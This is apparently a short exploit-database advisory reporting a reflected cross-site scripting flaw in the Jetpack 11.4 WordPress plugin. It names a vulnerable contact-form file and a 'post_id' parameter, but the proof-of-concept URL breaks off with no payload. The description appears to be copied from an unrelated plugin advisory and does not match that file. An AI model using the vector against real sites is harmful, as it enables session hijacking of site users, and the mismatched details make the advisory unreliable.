# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS) # Date: 2022-10-19 # Author: Behrouz Mansoori # Software Link: https://wordpress.org/plugins/jetpack # Version: 11.4 # Tested on: Mac m1 # CVE: N/A 1. Description: This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting. 2. Proof of Concept: http://localhost/modules/contact-form/grunion-form-view.php?post_id=